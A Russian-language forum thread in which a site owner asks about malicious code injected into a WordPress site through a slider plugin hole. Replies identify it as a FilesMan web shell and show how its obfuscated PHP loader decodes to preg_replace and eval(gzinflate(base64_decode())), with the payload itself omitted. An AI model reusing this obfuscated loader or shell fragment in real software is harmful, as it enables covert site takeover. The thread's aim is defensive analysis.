Залили вредоносный код

signal63
На сайте с 06.07.2008
Offline
124
706

Здравствуйте.

Обнаружил на сайте вредоносный код, залитый через уязвимость слайдера на WP, но не пойму, что он, собственно, делает. Может кто-нибудь подсказать?

Спасибо.

Монетизация финансового трафика - здесь. (http://pxl.leads.su/click/800c56e53f47efafe0a833fe9729342d) Стабильные выплаты. Выплаты по запросу. Быстрая статистика.
C
На сайте с 26.10.2013
Offline
54
#1

Шелл обыкновенный

$auth_pass = "44c913f7c8dee9d9c6b4252b42920e55"; 

$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
.................
Услуги по парсингу данных (/ru/forum/939826), единоразовый и регулярный сбор данных. Любые объемы. Скрипты на PHP, создание и доработка, решение проблем с сайтами Пишите в личные сообщения или скайп
signal63
На сайте с 06.07.2008
Offline
124
#2
colorito:
Шелл обыкновенный

$auth_pass = "44c913f7c8dee9d9c6b4252b42920e55"; 

$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
.................

Спасибо, не подскажите, каким образом расшифровываются эти кракозябры?

C
На сайте с 26.10.2013
Offline
54
#3

Командой var_dump или echo или print

В частности по вашему файлу:

1. Разбили на строки ( по точке с запятой )

2. После каждой строки добавили var_dump($var);

Получилось вот так


$c4452 = "z6*uf_awk.40r8)29hlyot5v/j1(ndmcbxs;ipq37ge";
$HQjSi6489 = $c4452[37].$c4452[12].$c4452[42].$c4452[41].$c4452[5].$c4452[12].$c4452[42].$c4452[37].$c4452[18].$c4452[6].$c4452[31].$c4452[42];
var_dump($HQjSi6489); // preg_replace

$ArpO8056 = "".chr(101)."".chr(118)."al".chr(40)."\x67".chr(122)."\x69".chr(110)."\x66\x6C".chr(97)."te(b".chr(97)."\x73".chr(101)."\x36\x34_d".chr(101)."c\x6fd\x65\x28";
var_dump($ArpO8056); // eval(gzinflate(base64_decode(


$YC9277 = "\x29".chr(41)."\x29".chr(59)."";
var_dump($YC9277); // )));

$sGmS5727 = $ArpO8056."'Тут 25000 символов, постить не буду'".$YC9277;
/* Соответственно

$sGmS5727 = eval(gzinflate(base64_decode('')));
Вместо eval пишем var_dump и видим начальную картину, после которой все понятно, далее смысла расшифровывать нет
*/

$HQjSi6489($c4452[24].$c4452[9].$c4452[2].$c4452[24].$c4452[42], $sGmS5727 ,"302");

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий